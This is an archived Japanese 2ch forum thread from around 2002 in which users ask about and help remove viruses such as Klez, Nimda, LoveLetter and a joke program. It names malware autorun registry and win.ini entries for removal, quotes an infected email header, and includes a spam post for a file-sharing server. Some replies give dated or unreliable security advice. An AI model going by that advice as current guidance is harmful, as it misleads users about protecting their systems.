☆ウィルス情報＆質問　総合スレッド☆part5

ウィルスに関わる話題・質問はこちらに

IPAセキュリティセンターhttp://www.ipa.go.jp/security/isg/virus.html
Symantec Security Response http://www.symantec.com/region/jp/sarcj/
Trend Micro ウイルス情報 http://www.trendmicro.co.jp/virusinfo/index.asp
McAfee ウイルス情報 http://www.nai.com/japan/virusinfo/vinfo.asp
オンラインウイルス検索http://housecall.antivirus.com/housecall/start_jp.asp

[関連リンク]過去ログ・関連スレ等>>1-20あたり 補足>>1-50

・ウィルス用ソフトを入れて無い人は(知識や技術のある人を除いて)速やかに入れましょう
(無料AntiVirus【AntiVirPE/AVG/Antidote簡易版】http://pc.2ch.net/test/read.cgi/sec/1015584020/l50)

(win)[Ctrrl]+{F}キー (mac){コマンド}+{F}キーを押すとページ内検索が出来ます
このスレや過去スレの過去ログを検索してから質問してください

過去スレ
このウイルス何？ http://pc.2ch.net/test/read.cgi/sec/999636595/l50
☆ウィルス情報＆質問　総合スレッド☆ http://pc.2ch.net/test/read.cgi/sec/1010948022/
☆ウィルス情報＆質問　総合スレッド☆part2 http://pc.2ch.net/test/read.cgi/sec/1016863569/l50

Symantec Security Check
http://security2.norton.com/SSC/GetBrowser.asp?pkj=TICCYSHSFVIGMKIIPLB&scantype=2&plfid=20&langid=jp&venid=sym&from=/ssc/lunavbrk.asp
オンラインウイルス検索http://housecall.antivirus.com/housecall/start_jp.asp

検索窓にファイル名等を入力して利用。
基本中の基本だけど、ワクチンベンダーごとに、ウイルスの命名は違う。

Symantecウイルス辞典日本語版
http://www.symantec.com/region/jp/sarcj/vinfodb.html
Symantecウイルス辞典英語版（日本語版と微妙に内容が異なる事がある）
http://www.symantec.com/avcenter/vinfodb.html

TrendMicroウイルス情報
http://www.trendmicro.co.jp/vinfo/

McAFEEウイルス情報
http://vil.mcafee.com/default.asp?

[ウィルス対策ソフト]
【ノートン】インターネットセキュリティ2002 Ver.8 http://pc.2ch.net/test/read.cgi/sec/1019831285/l50
ウイルスバスター２００２ Part3 http://pc.2ch.net/test/read.cgi/sec/1016076378/l50
がんばれマカフィー http://pc.2ch.net/test/read.cgi/sec/1020474494/l50
がんばれ!!ウイルス警備隊Ｖ３ http://pc.2ch.net/test/read.cgi/sec/1005442785/l50

[ウィルス対策ソフト（無料）]
無料AntiVirus【AntiVirPE/AVG/Antidote簡易版】http://pc.2ch.net/test/read.cgi/sec/1015584020/l50
H+BEDV Antivir Personal Edition Part2 http://pc.2ch.net/test/read.cgi/sec/1016561367/l50
【フリー】AVG Anti-Virus　Version2 http://pc.2ch.net/test/read.cgi/sec/1018966825/l50
アンチドートを語ろう♪ http://pc.2ch.net/test/read.cgi/sec/1003987914/l50

最強のウィルス対策用ソフト http://pc.2ch.net/test/read.cgi/sec/1000957607/l50

「森で遊ぼう」
(ファイヤーウォールソフト・無料ウィルス用ソフト等セキュリティ関係解説サイト
ダウンロードページのリンク　日本語解説ページあり)
http://eazyfox.tripod.co.jp/


・IE(インターネットエクスプローラ)やOE(アウトルックエクスプレス)は危ないと感じた人達へ
ネスケ（ネットスケープコミュニケータ）を使用するという手段があることも念頭にいれておいてください
http://home.netscape.com/ja/

新種のウィルスが流行したときは専用スレのリンクよろしくお願いします

「Nimda !! 」【その４】 http://pc.2ch.net/test/read.cgi/sec/1001864573/l50
猛威をふるう BADTRANS.B　Re: メール （４通目）http://pc.2ch.net/test/read.cgi/sec/1008355163/l50
HDぜんぶ消去した上ズタズタに！！ウィルス http://pc.2ch.net/test/read.cgi/sec/1001662997/l50
Flashムービーに感染するウィルスが登場！ http://pc.2ch.net/test/read.cgi/sec/1010564675/l50
'code red'wormに続きw32/sircam http://pc.2ch.net/test/read.cgi/sec/995726416/l50
W32.Aliz.Wormって何？ http://pc.2ch.net/test/read.cgi/sec/1006266327/l50
またIEにセキュリティホール！ http://pc.2ch.net/test/read.cgi/sec/1008610094/l50
開いただけでウイルスに感染するページhttp://pc.2ch.net/test/read.cgi/sec/994847789/l50
WORM_GONE.A http://pc.2ch.net/test/read.cgi/sec/1007514716/l50
Ｍａｃ用ウイルス対策ソフト　http://pc.2ch.net/test/read.cgi/sec/1007675941/l50
virus下さい。http://pc.2ch.net/test/read.cgi/sec/996909531/l50
みんなでウイルスつくろうよ！！http://pc.2ch.net/test/read.cgi/sec/1008248305/l50　
[初心者必見]分かりやすいnimda対策ページhttp://pc.2ch.net/test/read.cgi/sec/1001407163/l50
ウィルスくれよ。サーカムとか。http://pc.2ch.net/test/read.cgi/sec/996425178/l50
コードレッドパート5 日本政府は反省汁http://pc.2ch.net/test/read.cgi/sec/997783469/l50
KDMEMPKD.EXEってなに？ http://pc.2ch.net/test/read.cgi/sec/1011333304/l50
怪奇画像（怖い女）が一定感覚で現れる症状 http://pc.2ch.net/test/read.cgi/hack/1011083919/l50
気持ち悪い女の顔がhttp://pc.2ch.net/test/read.cgi/sec/1012037926/l50
今日最新のウイルスって・・・！！(Myparty) http://pc.2ch.net/test/read.cgi/sec/1012220835/l50
HDぜんぶ消去した上ズタズタに！！ウィルス ２台目http://pc.2ch.net/test/read.cgi/sec/1012296560/l50
破損、トロイ、ウィルス入り ４ http://tmp.2ch.net/test/read.cgi/download/1016806114/l50
【ネット】『C』で記述した初のウイルスが登場http://news.2ch.net/test/read.cgi/newsplus/1015048480/l50
ダイヤルQ2か国際電話に接続を切り替えるやつhttp://pc.2ch.net/test/read.cgi/isp/1010717649/
＜IT＞CからZドライブを全て上書きするFinal Fantasyワームhttp://news.2ch.net/test/read.cgi/newsplus/1015938003/l50

【ウィルス警報】patch.exeに注意しる！http://pc.2ch.net/test/read.cgi/sec/1016082075/l50
＜IT＞ご注意！チェック済み装うウイルス「マイライフＢ」http://news.2ch.net/test/read.cgi/newsplus/1016802914/l50
ADSLユーザーにも 国際電話発信トラブルhttp://pc.2ch.net/test/read.cgi/sec/1016106504/l50
【勝手にDLし勝手に実行！ひとりエッチ上手なIE6】http://pc.2ch.net/test/read.cgi/sec/1016485189/l50
ＩＥ５・５と６・０、ネット閲覧ソフトに欠陥http://pc.2ch.net/test/read.cgi/sec/1005605775/l50
PE_Mtx.A, WORM_MTX.A　に犯されました。http://pc.2ch.net/test/read.cgi/sec/1015939831/l50
開いただけでウイルスに感染するページhttp://pc.2ch.net/test/read.cgi/sec/994847789/l50
Klez系,Klez.Eスレッドhttp://pc.2ch.net/test/read.cgi/sec/1018248786/l50
インターネット悲しい目をした犬http://pc.2ch.net/test/read.cgi/sec/1018186700/l50
【勇気が無くてみれない画像スレッド】http://ex.2ch.net/test/read.cgi/entrance/1018680687/l50
♂MCAFEEのウィルススキャン　どうよ♂http://pc.2ch.net/test/read.cgi/software/1001838214/l50

part4
http://pc.2ch.net/test/read.cgi/sec/1024061532/

part3　
http://pc.2ch.net/test/read.cgi/sec/1020696417/

ノートンインターネットセキュリティーを買ってきた。
で、セキュリティーをどのくらいにセットしとけば
まあ安全でHPとめーるを観覧できるだろうか?
僕は初心者でパソコンはHP作ってネットショップ
やってます。
どっかに教えてくれるスレある?

新種のウィルスが流行したときは専用スレのリンクよろしくお願いします

「Nimda !! 」【その４】 http://pc.2ch.net/test/read.cgi/sec/1001864573/l50
猛威をふるう BADTRANS.B　Re: メール （４通目）http://pc.2ch.net/test/read.cgi/sec/1008355163/l50
HDぜんぶ消去した上ズタズタに！！ウィルス http://pc.2ch.net/sec/kako/1001/10016/1001662997.html
Flashムービーに感染するウィルスが登場！ http://pc.2ch.net/test/read.cgi/sec/1010564675/
'code red'wormに続きw32/sircam http://pc.2ch.net/test/read.cgi/sec/995726416/l50
W32.Aliz.Wormって何？ http://pc.2ch.net/test/read.cgi/sec/1006266327/l50
またIEにセキュリティホール！ http://pc.2ch.net/test/read.cgi/sec/1008610094/l50
開いただけでウイルスに感染するページhttp://pc.2ch.net/test/read.cgi/sec/994847789/l50
WORM_GONE.A http://pc.2ch.net/test/read.cgi/sec/1007514716/
Ｍａｃ用ウイルス対策ソフト　http://pc.2ch.net/test/read.cgi/sec/1007675941/l50
virus下さい。http://pc.2ch.net/test/read.cgi/sec/996909531/l50
みんなでウイルスつくろうよ！！http://pc.2ch.net/test/read.cgi/sec/1008248305/l50　
[初心者必見]分かりやすいnimda対策ページhttp://pc.2ch.net/test/read.cgi/sec/1001407163/l50
ウィルスくれよ。サーカムとか。http://pc.2ch.net/test/read.cgi/sec/996425178/l50
コードレッドパート5 日本政府は反省汁http://pc.2ch.net/test/read.cgi/sec/997783469/l50
KDMEMPKD.EXEってなに？ http://pc.2ch.net/sec/kako/1011/10113/1011333304.html
怪奇画像（怖い女）が一定感覚で現れる症状 http://pc.2ch.net/test/read.cgi/hack/1011083919/l50
気持ち悪い女の顔がhttp://pc.2ch.net/test/read.cgi/sec/1012037926/l50
今日最新のウイルスって・・・！！(Myparty) http://pc.2ch.net/test/read.cgi/sec/1012220835/l50
HDぜんぶ消去した上ズタズタに！！ウィルス ２台目http://pc.2ch.net/test/read.cgi/sec/1012296560/
破損、トロイ、ウィルス入り ４ http://tmp.2ch.net/download/kako/1016/10168/1016806114.html
【ネット】『C』で記述した初のウイルスが登場 http://news.2ch.net/newsplus/kako/1015/10150/1015048480.html
ダイヤルQ2か国際電話に接続を切り替えるやつ
＜IT＞CからZドライブを全て上書きするFinal Fantasyワームhttp://news.2ch.net/newsplus/kako/1015/10159/1015938003.html

【ウィルス警報】patch.exeに注意しる！http://pc.2ch.net/test/read.cgi/sec/1016082075/l50
＜IT＞ご注意！チェック済み装うウイルス「マイライフＢ」http://news.2ch.net/newsplus/kako/1016/10168/1016802914.html
ADSLユーザーにも 国際電話発信トラブルhttp://pc.2ch.net/test/read.cgi/sec/1016106504/l50
【勝手にDLし勝手に実行！ひとりエッチ上手なIE6】http://pc.2ch.net/test/read.cgi/sec/1016485189/l50
ＩＥ５・５と６・０、ネット閲覧ソフトに欠陥http://pc.2ch.net/test/read.cgi/sec/1005605775/l50
PE_Mtx.A, WORM_MTX.A　に犯されました。http://pc.2ch.net/test/read.cgi/sec/1015939831/l50
開いただけでウイルスに感染するページhttp://pc.2ch.net/test/read.cgi/sec/994847789/l50
Klez系,Klez.Eスレッドhttp://pc.2ch.net/sec/kako/1018/10182/1018248786.html
インターネット悲しい目をした犬http://pc.2ch.net/sec/kako/1018/10181/1018186700.html
【勇気が無くてみれない画像スレッド】http://ex.2ch.net/entrance/kako/1018/10186/1018680687.html
♂MCAFEEのウィルススキャン　どうよ♂http://pc.2ch.net/software/kako/1001/10018/1001838214.html
【流行の】Frethem【ﾖｶｰﾝ】http://pc.2ch.net/test/read.cgi/sec/1026734507/l50
Klez.E、Klez系スレッド part3 http://pc.2ch.net/test/read.cgi/sec/1024255721/l50
●ＨＤＤ全消去ウイルス３● http://pc.2ch.net/test/read.cgi/sec/1024943662/l50

[ウィルス対策ソフト]
【ノートン】ｲﾝﾀｰﾈｯﾄｾｷｭﾘﾃｨ2002 Ver.10 http://pc.2ch.net/test/read.cgi/sec/1026543973/l50
ウイルスバスター２００２ Part４ http://pc.2ch.net/test/read.cgi/sec/1021091165/l50
がんばれマカフィー http://pc.2ch.net/test/read.cgi/sec/1020474494/l50
がんばれ!!ウイルス警備隊Ｖ３ http://pc.2ch.net/test/read.cgi/sec/1005442785/l50

[ウィルス対策ソフト（無料）]
無料AntiVirus【AntiVirPE/AVG/Antidote簡易版】http://pc.2ch.net/test/read.cgi/sec/1015584020/
H+BEDV Antivir Personal Edition Part2 http://pc.2ch.net/test/read.cgi/sec/1016561367/l50
【フリー】AVG Anti-Virus　Version2 http://pc.2ch.net/test/read.cgi/sec/1018966825/l50
アンチドートを語ろう♪ http://pc.2ch.net/test/read.cgi/sec/1003987914/l50

最強のウィルス対策用ソフト http://pc.2ch.net/test/read.cgi/sec/1000957607/l50

>>1

・ウィルス用ソフトを入れて無い人は(知識や技術のある人を除いて)速やかに入れましょう

無料ウィルス用ソフトAVP/AVG/Ad簡(その２
http://pc.2ch.net/test/read.cgi/sec/1027400238/l50

お願いなんですが。
最新のvilliはどのワクチンベンダーでも、（大体）みんな復元ポイント関連の注意は書かれているんですが。
古いvilli関連のページだと、書かれていないケースも多く存在しますんで。
念のため、見つけたら誘導願いまする。

Windows Me/XP の「_restore」フォルダから何度もウイルスを発見してしまう
http://www.trendmicro.co.jp/esolution/solutionDetail.asp?solutionId=2186

>>8 とりあえずデフォルト・推奨と書かれてる設定で使う。ノートンは知識なくても
一定レベルのセキュリティが確保できるのが利点。

恐怖のHDD破壊ウイルス：いたづらしてごめんね
http://pc.2ch.net/test/read.cgi/sec/1018874433/l50

添付ファイル
file.html border.exe･････KlezH file.txt index.8
Message-IDがない。
http://www.yukaido.ne.jp/ 愉快堂出版 http://whois.nic.ad.jp/cgi-bin/whois_gw?key=210.230.82.0
http://www.google.com/[email protected]&ie=UTF-8&oe=UTF-8&hl=ja&lr=

Received: from smtp.yukaido.ne.jp (210.230.82.4)
by ** with SMTP; **
Received: (qmail 78965 invoked from network); **
Received: from p29493c.kngwnt01.ap.so-net.ne.jp (218.41.73.60)
by smtp.yukaido.ne.jp with SMTP; **
From:hirata< hirata＠naoe.hiroshima-u.ac.jp >
To: [email protected] [email protected]
[email protected]
[email protected]
[email protected]
[email protected]
Subject: Fw:HQ2037_20020718_2013_thriftytales_com,eager to see you

すみません、質問なんですがこの症状のウイルスを教えてください
パソコンを起動してまもなく、DOSの窓が開き
「cドライブをフォーマットします」
と出て、「いいえ」を実行すると
「この処理はキャンセルできません」
とでて再起動をはじめました
ちなみにまだ再起動はしていません
ドライブをDに変更して中を見たところデータはまだ残っており
ウイルスバスター（体験版）を実行したのですが検知できませんでした
名称がわからないと対処ができないので
よろしくお願いします

>>17
ウイルスじゃなくってイタズラプログラムなんじゃないの？
ちょっと前に２ちゃんのあちこちに貼られていた
いわゆる「マンキン・ウイルス」、これがその類。
アンチウイルス・ベンダーによってはトロイ扱いにして
処理対象にしたりしなかったり、さらにはニュース記事に
ウイルス扱いしたものまで登場して、いろいろ議論があったが。
こんなのとか
http://pc.2ch.net/test/read.cgi/sec/1024943662/

>>18
やはりイタズラプログラムっぽいですか
とりあえずそれらについて調べてみます
情報ありがとうございました

以前このｽﾚだったかどうかわからないのですが、「SU0.MPG」「SU1.MPG」
というﾌｧｲﾙがﾄﾞﾗｲﾌﾞCにしらない間にできてしまい、消去しても
またできてしまう、というのと同じ症状になり、再ｾｯﾄｱｯﾌﾟしたのですが、
また同じ症状がでてしました。再ｾｯﾄｱｯﾌﾟ後にﾈｯﾄをしている際に
「GAIN」というところの「Date Manager」というｿﾌﾄがしらない間にｲﾝｽﾄｰﾙ
されてしまったりもしました。ﾌｧｲｳｫｰﾙやｽｷｬﾝなどしてはいるのですが。
どうかご教授お願いします。またｽﾚ違いだったらどのｽﾚにいけばいいか教えて
いただけたら幸いです。お願い致します。

>>20
こちらかと。
http://pc.2ch.net/test/read.cgi/sec/1027059662/

>>21
ありがとうございました。相談に逝ってきます。

17です
イタズラプログラムについていろいろと調べてみたのですが、
該当するものが見つからず、行き詰まってしまいました
上記の条件に該当するイタズラプログラム、ウイルスは
ほかにどのようなものがあるのかできれば教えてもらえませんか？

>>23
とりあえず、今残ってるデータは全てバックアップしとけ。
で、再インストールを奨める。

何か変なもの実行したりしなかった？

>>24
はい、とりあえず最低限のものはバックアップ中です
でも再インストール前に何に感染したのか知りたいので
なんとか情報をお願いします

変なものは特に実行してないと思います

>>25
ぶっちゃけた話、MXやってる？あるいは割れ物アプリ使ってるとか。
アンチウィルスソフトの定義ﾌｧｲﾙが古すぎるとか。

そこんとこどうよ？

そこんとこは結構心当たりがあったりします
アンチウィルスソフトはとりあえずバスタの体験版の最新を使ったので古すぎるということはないと思います

>>27
体験版じゃダメダメ

やはり製品版を買わなければだめですかね？
一応バスタのオンラインチェックもしてみたんですがそれも引っかかりませんでした

>>29
オンラインチェックで解決するなら製品版は売れない。

>>27
アンチウィルスソフトは定義ﾌｧｲﾙを常に最新版に更新しないと
意味がない。しかもここ数日間かなり頻繁にアップデートしてるのでなおさら。

場合によっては自分だけでなく、知らないうちに他人にも迷惑を
かける可能性もあるので、素直にバスターもしくはノートンを買っとけ。

http://www.yomiuri.co.jp/00/20020729i105.htm
ドールだって

>>32
の　ドールください

[email protected]

これ、Whiterとは違うのか？

実物が手に入らなかった。

2ch見たら反応するウィルスの情報ってどこだっけ？

>>37 ノートンがvbsウィルスのソースに誤反応
http://pc.2ch.net/test/read.cgi/sec/1025872269/

＞38
ありがとっ！

お尋ねしたいのですが、どーやらウィルスにやられたようで
まともに起動しなくなりました。
ファイルが壊れて
頭が”run is dos mode”と書き換えられてしまったようです。
いろんな開き方を試みましたが、開けませんでした。
メールやワードファイルなどを復旧したいのですが可能でしょうか?

W32.Duni.Wormに感染しました。心配なのでリカバリーします。

>>40
なんのウィルスに感染したのかわからなければ、
すでにメールデータも感染している可能性があるので、
操作すること自体おすすめしない。あきらめるほかない。

それにそもそも DOS の基本コマンドとかわかる？わかっていた
としても、あなたの HDD のディレクトリ構造などこっちはわからんから
2ch のような掲示板で、操作を遠隔操作するのはまず不可能。

>>41
？？？上書き再インストール？？？クリーンインストール？？？

>>42
ディレクトリ作成と移動とファイルのコピーデリートくらいならなんとか。
もし可能なら、データ復旧会社みたいなところに頼んででも復旧させたいくらいなんですよ。

１．Norton AntiVirus 2002
２．ウイルスバスター 2002
３．AntiVir Personal Edition
４．AVG 6.0 Free Edition
５．Avast Home Edition
６．Ａｎｔｉｄｏｔｅ 簡易版
７．ウイルスバスター Online
８．Panda ActiveScan
９．ウイルス警備隊
10．McACafee VirusScan Online
11．Symantec Securty Check

※オンラインスキャンはウイルススキャンの性能が良くても実用性の面で順位が下がっています

>>44
国際サッカー連盟？

ＭＳＮのメッセがウイルスにかかったようなのです。
登録してある友人のアドレスにウイルスメールが後を絶たないそうで…
アンインストールしてもダメなのです。
ウイルスについては初心者同然なので全くどうしていいかわかりません。
どうしたらいいのでしょうか？

ノートンのメル鯖、今おかしくない？

>>43
本当にウィルスにやられているんなら、データ復旧会社に
頼んだほうがよろし。

ただ、vxd ファイルなどがぶっ壊れているだけなら、
安い HDD 買ってくれば、その知識で十分復旧可能だと
思うんだけど？

>>48
＞ただ、vxd ファイルなどがぶっ壊れているだけなら、

それはどういう風に復旧すればよいのですか?簡単でいいので説明してください。

[SceneCritique] irc.scenecritique.com:8888 OP041
詳しくはhttp://opennap.scenecritique.com/参照。
ウザい鯖管もチャット部屋も無し要するに素人にはお勧めでき
ない共有0者検索不能の玄人向け空間。けど制限低めで地球に優しい
諸刃の剣。密談はIRC(irc.scenecritique.com:6667、IP不可視IRC)
で。http://s1p.net/sc/ (IRC)ね。ヘルプはIRCの#scにて、#winnyも
あり□。WWWからの#scダイレクト参加は
http://chat.scenecritique.com/qi-login.cgi?ch=%23sc

ニュース速報版を見ていたらLOVE-LETTERに感染したよ・・・

汚染を除去しました。

>>51
感染ﾁﾞｬﾅｸﾃ｢検出｣です。ﾝﾃﾞﾓ漏れ的には｢誤｣はつきませんとおもうます。
ﾅ､ﾅ､ﾅﾝﾄﾞｲｯﾀﾗﾜｶﾙﾉﾃﾞｽｶｧ〜〜〜!!

某所で､EXEファイル落として実行したら､
なんか変な女の画像が画面いっぱいに出てきました｡
ヤバイかな･･････と思い､急いで電源を切り､
再起動すると､最初は何も起きないのですが､
少し経つと､また変な女の画像が画面いっぱいに･･････
かなり不気味です｡
気の弱い自分にとって､かなり嫌な存在です｡
これはウィルスなのでしょうか？
一応､スキャンして､怪しいファイルなども消してみましたが､
なんか怖くて､再起動したくありません｡
どうにかなりませんか？誰か自分を助けてください｡

>>54
OSは？
msconfig で削除かな

>>55
osはwinMEです
msconfigってなんですか？
初心者ですいません(汗

スタートアップにある怪しいショートカットを削除
スタートメニューのファイル名をして実行＞msconfig＞怪しい奴のチェックをはずす
わからんかったら全部はずして、再起動をかけながら一つずつチェックを入れて探す
つーかウイルスじゃねーだろ・・・

http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=JOKE_MADO.A&VSect=T
たぶんこれだと思うのですが･･･
ここに書いてある文章がいまいちわかりません｡
だれかわかりやすく教えてくれませんか？
おねがいします｡

・手動削除手順：
　プログラムの自動起動設定を削除します：Windowsのシステムエディタ(SYSEDIT.EXE)などを使用して"WIN.INI"の記述を修正してください：

　修正例：
・"WIN.INI"の"Run="の項目を修正
　修正前："Run = ozawa.exe"
　　↓
　修正後："Run ="

で、これのどこがわからんのか書け。

>>59
win.iniのRun = ozawa.exeの
ozawa.exeを消せばいいのですか(汗
わかりました｡
ありがとうございます｡

age

worm.win32.datomってのに感染したみたいなんですが
msvxd.exeってのは削除してしまって大丈夫なんでしょうか

WORM_KLEZでは、

http://www.trendmicro.co.jp/klez/whats.asp

にあるように、WQK.EXE 「PE_ELKERN.B」で検知します。
　　・Windows NT/2000/XP：WQK.DLL で検知します。

と説明されていますが、
私のWINDOWS\SYSTEMには、
WQK.exe、および、WQK.DLL
というファイルではなくて、ディテクトリ（フォルダ）が形成されており、
中には何のファイルもありません。

感染しているのかと思って、レジストリを調べてみましたが、
上記サイトにある、

\HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run

から削除すべき、
値：Krn132 = ＜Windowsのシステムディレクトリ＞\Krn132.exe
　　値：WinSvc = ＜Windowsのシステムディレクトリ＞\WinSvc.exe（WORM_KLEZ.Cの場合）
　　値：Wink??? = ＜Windowsのシステムディレクトリ＞\WINK???.exe（WORM_KLEZ.Eの場合、「???」はランダムな文字列であり不定です）
　　値：wqk = ＜Windowsのシステムディレクトリ＞\wqk.exe

が見当たりません。
これって、私のマシンは感染しているのでしょうか？
フォルダ更新時期が今年の5月になっていますが、妙なメールが沢山届くようになって
今日になって調べて初めて判明しました。

詳しい方ご教授お願いします。

ウイルスウイルスって・・・馬鹿かおまえら。

（-＿-）ｳﾂﾀﾞ >>64

（´-`）.｡oO（　スレタイ見る限りそれで当たり前
（´-`）.｡oO（　何がおかしいのか。

>>63
Klezスレとマルチ。

http://orbita.starmedia.com/~lautaroml/virus.html

　↑コレ何？

長文で失礼します

Symantec Security Check
http://security2.norton.com/ssc/home.asp?langid=us&venid=sym&plfid=20&pkj=PNDUDTKJBTVISBYWWYP
上のURLに飛んで、ウィルスチェックをしたところ。

----------------------------------------------------------------------------------
Results of Virus Detection Scan
104098 files scanned, 4 file(s) infected.

Search for the name of the virus(s) listed below on the Symantec Security Response site for removal information.

A scan has not been run. To start Scan for Viruses, click here.

c:\WINDOWS\ﾃﾞｽｸﾄｯﾌﾟ\かちゅーしゃ\log\money.2ch.net\stock\1015030446.dat is infected with VBS.LoveLetter.Var
c:\WINDOWS\ﾃﾞｽｸﾄｯﾌﾟ\かちゅーしゃ\log\pc.2ch.net\sec\1000753945.dat is infected with VBS.LoveLetter.A
c:\WINDOWS\ﾃﾞｽｸﾄｯﾌﾟ\かちゅーしゃ\log\pc.2ch.net\tech\993358225.dat is infected with JS.Exception.Exploit
c:\WINDOWS\ﾃﾞｽｸﾄｯﾌﾟ\かちゅーしゃ\log\pc.2ch.net\tech\1026140108.dat is infected with VBS.LoveLetter.A
----------------------------------------------------------------------------------

このような結果が出て、４つのファイルがウィルスに感染している事がわかりました。
LoveLetterで検索したところ、やはり前にテレビでもよく流されていたウィルスだと確定。
このウィルスはOutlookに登録されているメールアドレスに自分を送信するらしいのですが
幸いOutlookをPCにインストールしていないので大丈夫だったようで安心したのですが
ここで、疑問がわいていきたのですが
このウィルスって題が「ILOVEYOU」という非常にわかりやすい題でとどくのですよね。
今まで、「ILOVEYOU」という題でメールが届いたことはないのです。
メーラーはEudora lightを使用し、添付されて送られてくるメールがいくつかあったのです
が、いっさい開いていません。添付ファイルを開いて実行しなければ感染はしないのですよね。
それともEudoraだと添付ファイル付きのメールを受信しただけで感染してしまっていたので
しょうか。

汚染を除去しました。

>>68=69
長文ご苦労さまです。とりあえず、こちらでも。
http://pc.2ch.net/test/read.cgi/sec/1025872269/l50

>>70
どうもご親切にありがとうございます。

必死で、いろんなサイトを巡って調べてました。
でも、まあいろいろ勉強になったのでよしとします。
これをきっかけに、セキュリティの勉強でもしようかと思います
ありがとうございました。

>>68　どうでもいいけど
　
おいお前

”c:\WINDOWS\ﾃﾞｽｸﾄｯﾌﾟ\かちゅーしゃ\log\”

何処にログフォルダ作ってるんだ
せめてProgram Filesに作れよ

それとも俺の勘違いか

>>72
勘違いではないです。そこに置いてますけど
なにか問題でもあるのでしょうか？
ひょっとして、ダウンしたアプリ類はProgram Filesに入れておいた
方がいいのですか？

自分のパソコンがハッキングされているか調べる方法はありますか？
また、それは他人からわかる事なのでしょうか？
それとオンラインスキャンで何も発見されなかった場合、安心しても大丈夫でしょうか？
教えてください。

>>74
＜それは他人からわかる事なのでしょうか？

？？？　他人って誰の事よ？

>>73
まあ何処に置くも貴方のかってですが、
logも貯まると500Mbぐらいにまですぐになるからね
Program Filesに入れてショートカットをデスクトップに作るほうがいいと思う。

他人って言うのは例えばここの板の人とか。

>>74
まず貴方のパソコンをハックする値打ちがあるか考えろ

>それとオンラインスキャンで何も発見されなかった場合、安心しても大丈夫でしょうか？
>教えてください。

何も発見されなかったのなら、大丈夫。

ありがとうございます

>>78
（　´_ゝ`）ﾌｰﾝ　じゃあ大丈夫と言う事にしておきましょう････

えっ！どういうことですか？

教えてください！

>>76
なるほど。
アドバイス通り、Program Filesに入れてショートカット作成する
ことにします。
ありがとうございました。

ＩＰアドレス　＊＊＊　＊＊＊　＊＊＊　＊＊＊は、ハードウェアのアドレスが＊＊　＊＊　＊＊
に設定してあるシステムと競合していることが、検出されました。という表示が現れたのですが、どういうことでしょう！？
全然わからないＡＤＳＬユーザーです。教えてください。

>>84
正確にメッセージ書け
ルータは使っているのか？PCは一台か？

>>84
つーか、板違い

＊＊＊の部分は、数字なんです。アドレスがわかると、２ｃｈ利用者に公開して
しまうことになると思うので、書けません。ＰＣは、一台です。ＡＤＳＬモデムを
使用してます。

>>87
IPって、どうせ192.168.0.XXXあたりなんじゃないの？
だったら書いても大丈夫だぞ。

>>87
だから、ルータを使用しているのかって聞いてるんだろが

IPが何だってんだよ・・・
61.211.46.40 が俺のIPだ。一体、何を恐れる？

自分のは127.0.0.1ですた

>>89
｢ｿﾈｯﾄ｣ﾃﾞﾂｶ
ﾓﾚﾉﾄｺﾄ､ﾁｶﾞﾀｶﾗｲｲﾃﾞﾂ

http://pcweb.mycom.co.jp/news/2002/08/02/08.html

ソースネクストか・・・
フリーウェア以下のソフトしか作れない会社だっけ？

>>92
>さらに、新種ウイルスの発生や、Internet Explorerを始め
>とするWindows OSのセキュリティ修正プログラムの更新情報
>を、随時、ポップアップとセキュリティセンター上で表示する。

ﾅｰﾝｶ､､､ｽﾊﾟｲｳｪﾜぽいﾃﾞﾂﾈ｡｡｡

>>93
それはフリーウェアの作者に失礼だ

ｷﾀ━(ﾟ∀ﾟ）━!!初klez!!
遅い？

このたびめでたく　nimda　に感染しました。これは該当するウィルスが含まれている *.eml ファイルがディスク上に複数あることを確認したので確実です。

で、普段からウィルススキャンソフトをインストールしていなかった漏れは、「オンラインでスキャンできるやつがあったよなぁ」と思い立ち、 Symantec と TrendMicro のオンラインウィルススキャンを試してみたんです。

そしたら、 Syjmantec のほうは 17　個のウィルス入りファイルを見つけてくれたんですが、TrendMicro の方はなにも見つけてくれませんでした。オンラインなんで、どちらもパターンファイルは最新に近いものが自動的にダウンロードされていると思うんですが…

今まで時々 TrendMicro のオンラインスキャンは使っていたのですが、なんか信用できなくなってしまいました。どうなんでしょ？ 友達にはいままで NAV でも買っておけば？といっていただけに、ちょっとショック。

>>97
オンラインスキャンとかはさ、Webに接続している間に感染活動を行って新たな被害者が出たりするから、使わない方がいいような気が。。。。

>>98 そうでつね。この板読んで、どのソフトがいいか検討してみます。
一ヶ月くらいのトライアル版も各社出してくれてるみたいだし。

それにしても、TrendMicro の On-line Scaner が Nimda を見落としたのには参った…

>>99 Scaner ⇒ Scanner

>>99-100
トレンドのオンラインスキャンは、圧縮ファイルでの検出力とかの点で弱いし。
警備隊v3でも書いたけど、ファイルスキャンで検出できなくても常時スキャンで何とかヒットする事もあるんで、インスコしているアンチウイルスソフトに代わるものでは無いっす。

>>99　Trendmicro の PC-cillin Trial Version ではちゃんと検出されました。

いろんな知り合いに呼ばれて、「ウィルスに感染してないか調べて」って言われるんですが、みんなウィルススキャンソフト持ってない。買えよって言いたくなるんですが、とりあえずその場をしのぐためにオンラインウィルススキャン使ってます。

いままでオンラインウィルススキャンはトレンドマイクロのしか使ったことなかったんですが、しマンテックも併用しよう。てか、マジでちゃんとソフト買おうと思います。しばらく PC-cillin Trial Version を使ってみます。１ヶ月使えるみたいなんで。

持ってないやつには素直にその場で「買え」っていいます。
あと↓とか。
無料ウィルス用ソフトAVP/AVG/Ad簡(その２
http://pc.2ch.net/test/read.cgi/sec/1027400238/l50

>>102
漏れ的には。
Norton入れた漏れのパソと、「感染？」パソをLANで直結。
クロスケーブルで繋ぐとなぜかうまくいかなかったりする時は、安ルーター使ってそれぞれプライベートIPアドレスにして、ルーターをゲートウェイにして、WEBに繋がない状態でスキャン。
でも最近では面倒なんで、HD外してスレーブ接続でやってまする。

体験版入れるってのもアリだけど、レトロウイルス（アンチウイルスソフトを落とすvilli）なら、駄目駄目っすけどね。

しかし何故バスターは、体験版はそこそこなのに、オンラインスキャンはいまいちなんでしょうね。謎。

製品版を買わせるためなんでは。＜オンラインスキャンはいまいち
体験版がしょぼいと買ってくれないだろうから、こっちはそれなりのチェックができるようにしてるとか。

>>104 シマンテックはオンラインもかなりｲｲ!!
そのかわり、ファイル名レポートしてくれるだけで、削除とかはしてくれない。

トレンドマイクロもそうすればいいのにね。
